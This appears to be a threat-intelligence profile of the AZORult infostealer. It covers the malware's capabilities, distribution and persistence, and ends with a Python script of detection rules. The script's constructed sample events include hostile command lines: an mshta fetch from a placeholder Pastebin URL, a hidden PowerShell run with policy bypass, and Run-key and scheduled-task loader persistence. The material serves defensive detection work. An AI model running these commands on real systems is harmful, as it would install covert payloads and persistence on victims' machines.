AZORult's Year Activity
AZORult is an infostealer trojan which has been used in the wild since early 2016. It has received multiple updates over the years, and is still being actively used in 2020. Initial versions were created in Delphi; later versions are now written in C++.
Initial versions of the family featured no persistence mechanism, and deleted themselves from the infected system after harvesting and exfiltrating useful personal data. Later updates have added persistence mechanisms, including via Scheduled Tasks and registry Run keys.
It can steal data from a range of sources, including:
- Various web browsers
- Email clients
- Cryptocurrency wallets (Bitcoin, Electrum, Ethereum, etc.)
- Common communication software (Telegram, Skype, Pidgin Messenger, etc.)
- Steam game client
- FTP/SSH credentials (FileZilla, WinSCP, etc.)
Samples are often distributed via malicious Office documents, though other methods including fake VPN downloads have also been observed.
At the end of 2018 the main seller of AZORult announced the discontinuation of the trojan's development and closed sales. However, in early 2019 a new version appeared online written in C++ rather than the original Delphi, apparently created by part of the initial development team. This version is sometimes referred to as AZORult++.
This newer version includes some additional features over the original, such as Remote Desktop Connection (RDP) to infected machines.
Triage processes the payload during analysis to extract the C2 URL/IP, making it visible even if execution fails or the C2 is now inactive.
Over time some persistence methods have been added to versions of AZORult. This generally includes a Run key in the registry pointing to a loader script, either stored locally or fetched remotely.
Some samples make use of tools like schtasks to create Scheduled Tasks that launch the loader script.
- Excel spawns unexpected process (MSHTA.exe)
- MSHTA and PowerShell make network requests
- Persistence via Run keys and Scheduled Tasks
- Uses Pastebin for payload download (depends on infection method)
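The persistence mechanisms and the behaviours listed above can be turned into simple detection rules. The following is an added example, not Triage's own detection logic: it runs five rules over a handful of constructed Sysmon-style events (process creation, network connection, registry value set). The event field names, the Office process list, the placeholder Pastebin URL, the documentation IP and the loader paths are all assumptions made for the example.

```python
import ntpath
import re
from typing import Callable, Dict, List, Tuple

# Constructed events loosely modelled on Sysmon IDs 1 (process create),
# 3 (network connect) and 13 (registry value set). Field names are assumed;
# this is not real telemetry.
SAMPLE_EVENTS: List[dict] = [
    {"id": 1,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://pastebin.com/raw/PLACEHOLDER"},
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe", "dest": "pastebin.com"},
    {"id": 1,
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -ep bypass -f C:\Users\Public\stage2.ps1"},
    {"id": 3,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "198.51.100.10"},  # documentation range, constructed
    {"id": 13,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate",
     "details": r"wscript.exe C:\Users\Public\loader.vbs"},
    {"id": 1,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /sc minute /mo 5 /tn "SysUpdate" /tr "wscript.exe C:\Users\Public\loader.vbs"'},
    {"id": 1,  # benign activity, should not match anything
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c dir"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Run / RunOnce keys under any hive.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# A Run value or task action that launches a script host, a script file or a URL.
LOADER_RE = re.compile(r"(mshta|powershell|wscript|cscript|\.vbs|\.js|\.hta|\.ps1|https?://)",
                       re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


def office_spawns_script_host(ev: dict) -> bool:
    """Excel (or another Office app) spawning MSHTA/PowerShell/WScript."""
    return (ev.get("id") == 1
            and basename(ev.get("parent_image")) in OFFICE_APPS
            and basename(ev.get("image")) in SCRIPT_HOSTS)


def script_host_network(ev: dict) -> bool:
    """MSHTA or PowerShell making an outbound connection."""
    return ev.get("id") == 3 and basename(ev.get("image")) in {"mshta.exe", "powershell.exe"}


def run_key_persistence(ev: dict) -> bool:
    """A Run/RunOnce value whose data points at a loader script or URL."""
    return (ev.get("id") == 13
            and bool(RUN_KEY_RE.search(ev.get("target_object", "")))
            and bool(LOADER_RE.search(ev.get("details", ""))))


def scheduled_task_loader(ev: dict) -> bool:
    """schtasks /create whose action launches a loader script."""
    cmd = ev.get("command_line", "")
    return (ev.get("id") == 1
            and basename(ev.get("image")) == "schtasks.exe"
            and "/create" in cmd.lower()
            and bool(LOADER_RE.search(cmd)))


def pastebin_fetch(ev: dict) -> bool:
    """Pastebin referenced on a command line or as a connection destination."""
    text = (ev.get("command_line", "") + " " + ev.get("dest", "")).lower()
    return ev.get("id") in (1, 3) and "pastebin.com" in text


RULES: Dict[str, Callable[[dict], bool]] = {
    "office_spawns_script_host": office_spawns_script_host,
    "script_host_network": script_host_network,
    "run_key_persistence": run_key_persistence,
    "scheduled_task_loader": scheduled_task_loader,
    "pastebin_fetch": pastebin_fetch,
}


def scan(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def summarize(events: List[dict]) -> Dict[str, int]:
    """Count hits per rule; useful as a quick triage score for a host."""
    counts = {name: 0 for name in RULES}
    for _, name in scan(events):
        counts[name] += 1
    return counts


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
    print(summarize(SAMPLE_EVENTS))
```

Each rule on its own is noisy (PowerShell making network requests is routine on many hosts), so in practice the value is in the combination: an Office-spawned script host followed by a Run key or scheduled task that points back at a script file is the chain described on this page, and correlating the hits per host rather than alerting on each rule separately keeps the false-positive rate manageable.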